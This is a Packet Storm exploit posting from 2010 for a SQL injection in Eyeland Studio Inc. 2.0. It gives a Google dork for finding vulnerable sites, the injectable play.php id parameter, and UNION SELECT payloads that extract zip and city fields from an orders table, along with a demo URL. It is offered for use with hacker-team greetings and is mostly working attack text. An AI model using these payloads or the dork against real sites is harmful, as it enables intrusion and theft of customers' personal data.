Eyeland Studio Inc. 2.0 SQL Injection

2010-06-14T00:00:00
ID PACKETSTORM:90625
Type packetstorm
Reporter Mr.P3rfekT
Modified 2010-06-14T00:00:00

Description

                                        
                                            `  
  
  
# Title: Eyeland Studio Inc. SQL Injection Vulnerability  
# Version: 2.0  
# Author: Mr.P3rfekT  
# Software Site:http://www.eyeland.com/  
# Tested on Lunix  
# CVE : N/A  
# Home :www.realmadridsy.com & www.v4-team.com/cc   
############### Founded By Mr.P3rfekT ##############  
  
  
# Dork :"Eyeland Studio Inc. All Rights Reserved."  
  
# Helllo Allz.  
  
  
  
# Exploit :  
  
http://[site]/path/play.php?id={SQLi}  
  
  
  
#Poc :  
union select 1,2,3,zip,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from orders  
  
  
# Poc:  
  
union select 1,2,3,city,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from orders  
  
  
# Demo:  
http:www.site.com/path/play.php?id=-25union select 1,2,3,zip,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from orders  
  
  
./done.  
  
  
Greeeeeeeeeeeeeetz : Cyb3r-DeViL , V4-team.com/cc Members Except Some Lammerz Cheaters They Know Them Self Muhahaha  
  
####################################################################   
_________________________________________________________________  
Hotmail: بريد إلكتروني موثوق فيه ويتمتع بحماية Microsoft القوية من البريد العشوائي.  
https://signup.live.com/signup.aspx?id=60969  
  
`